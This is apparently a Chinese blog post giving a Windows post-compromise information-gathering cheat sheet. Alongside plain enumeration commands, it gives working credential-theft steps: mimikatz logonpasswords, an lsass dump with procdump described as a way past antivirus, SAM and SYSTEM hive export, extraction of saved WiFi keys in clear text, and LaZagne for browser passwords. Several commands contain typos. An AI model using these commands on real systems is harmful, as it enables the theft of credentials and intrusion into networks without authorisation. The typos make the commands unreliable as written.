windows信息收集

最新推荐文章于 2023-03-14 23:42:05 发布

原创最新推荐文章于 2023-03-14 23:42:05 发布 · 675 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#windows #服务器 #网络

本文详细介绍了在Windows操作系统中进行信息收集的各种命令，包括获取主机名、IP地址、系统信息、补丁状态、环境变量、已安装软件、服务状态、路由表、WiFi连接历史、ARP表、本地用户组、会话信息、历史命令、DNS缓存、计划任务、网络接口、连接详情、当前用户、权限检查、域SID、服务详情、环境变量、注册表导出、日志复制、Host文件、中间件、敏感文件、组策略、启动项、防护软件检测、局域网主机、网络代理设置、本地用户详情、远程桌面连接记录、密码抓取、浏览器保存的密码、回收站内容以及域信息等。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

windows信息收集

windows信息收集常用命令

主機名

hostname

ip地址等信息

ipconfig

系统信息

systeminfo

查询补丁信息

wmic qfe list

查看环境变量

set

查看安装的软件

wmic product get name

查看服务

sc query

查看路由表

Route print

查看连接过的wife

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v
echo | netsh wlan show profiles %j key=clear

查看arp表

arp -a

查看本地用户组

net localgroup

查询客户机会话

query session

查询历史命令

doskey /history

查看dns缓存

ipconfig /displaydns

查看计划任务

schtasks

查看网卡信息、主机名、域信息

ifconfig \all

查看连接

netstat -ano

查看当前用户

whoami

查看当前用户

netuser

查看系统信息

echo %OS%

查看权限

whoami /priv

查询域SID

whoami /all

查询本机服务信息

wmic service list brief

查看环境变量

PATH

导出注册表

reg export HKLM hklm.reg
reg export HKCU hkcu.reg
reg export HKCR hkcr.reg
reg export HKU hku.reg
reg export HKCC hkcc.reg

复制日志

copy C:\windows\System32\winevt\Logs\System.evtx
copy C:\windows\System32\winevt\Logs\security.evtx
copy C:\wondows\System32\winevt\Logs\application.evtx

host文件

C:\Windows\System32\drivers\etc\hosts

中间件信息

 * 在启⽤了IIS的服务器上：
%windir%\system32\inetsrv\AppCmd.exe list site --列出⽹站列表
%systemroot%\system32\inetsrv\appcmd.exe list vdir --列出⽹站物理路径

敏感文件信息

C:\windows\repair\sam C:\windows\System32\config\sam //存储了WINDOWS系统初次安
装的密码
C:\Program Files\Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理源密码存储于此
C:\boot.ini //查看系统版本
C:\windows\repair\sam //C:\Windows\Syetem32\config\sam //存储Windows系统初次
安装的密码
C:\Program Files\mysql\data\mysql\user.MYD //MySQL root
C:\windows\php.ini //php配置信息

组策略

使⽤gpresult /h C:test.htm⽣成组策略报表

启动项

使用注册表查询

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

查看防护软件

tasklist 可通过进程名称中的关键字判断 如360,anti-
virus,kaspersky

局域网内的主机

net vier: 显示当前域内的计算机列表
ipconfig /all 内⽹的⽹络环境、dns服务器IP、域名信息等。
netstat -ano 可以看出本地系统开放了哪些端⼝
arp -a 查询本地ARP缓存中IP地址和MAc地址的对应关系

查看网络代理

reg query
"HKEY_CURPENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings"
查询window中设置的系统代理，即internet选项设置中的代理信息

vpn信息

获取PPTP配置信息
Windows系统拨号的宽带连接的配置信息存储在固定位置，路径如下：
%APPDATA%\Microsoft\Network\Connections\Pbk\rasphone.pbk
查看该⽂件即可活得PPTP连接的配置信息，包括服务器IP，不包括连接⽤户名和⼝令

本地用户信息

net localgroup //查看本地⽤户组
net user //查看本地⽤户
net localgroup administrators //查看哪些⽤户是管理员
net user administrator /avtive:y //开启⽤户

最近rdp连接信息

查看最近rdp连接过的主机
reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server
Client\Default"

抓取密码

使⽤mimikatz抓取本地⽤户的明⽂密码，需要管理员权限
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
绕过杀软
procdump64.exe -accepteula -ma lsass.exe lsass.dmp 下载导出的密码后使⽤mimkatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit
使⽤windows的注册表导出密码
reg save hklm\sam .\sam.hive & reg save hklm\system .\system.hive
mimikatz.exe "lsadump::sam /sam:Sam.hive /system:System.hive" exit

浏览器密码

Chrome中保存的密码先被⼆次加密，然后被保存在SQLite数据库⽂件中，位置如下：
%LocalAppData%\Google\Chrome\User Data\Default\Login Data
可使⽤USBStealer 导出浏览器历史记录以及密码
或者使⽤https://github.com/AlessandroZ/LaZagne
laZagne.exe browsers-chrome
此⼯具同样⽀持firefox以及系统中其他密码的导出

用户回收站

cd C:\$Recycle.bin\
使⽤dir /A查看隐藏⽂件
S-1-xxxx分别对应不同⽤户的回收站

域信息

nltest /dsgetdc:域名 找域控
或者使⽤dc列表nltest /dclist:domain-a 其中pdc是主域控
nltest /domain_trusts 可以列出域之间的信任关系
net user /domain 查看域⾥⾯的⽤户
net group /domain 获取域⽤户组信息
net group /domain 获取域⽤户组信息
net group "domainadmins /domain" 查看域管理组成员
net user domain-admin /domain 查看管理源登录时间，密码过期时间，是否有登录脚本，组分
配等信息
net time /domain可以查看域时间，以及域服务器的名字

命令历史记录

windovws并不像linux保存了bash_history，windows的命令历史记录只保存在内存中
可使⽤procdump dump出csrss.exe进程
然后⽤Volatility cmdscan模块提取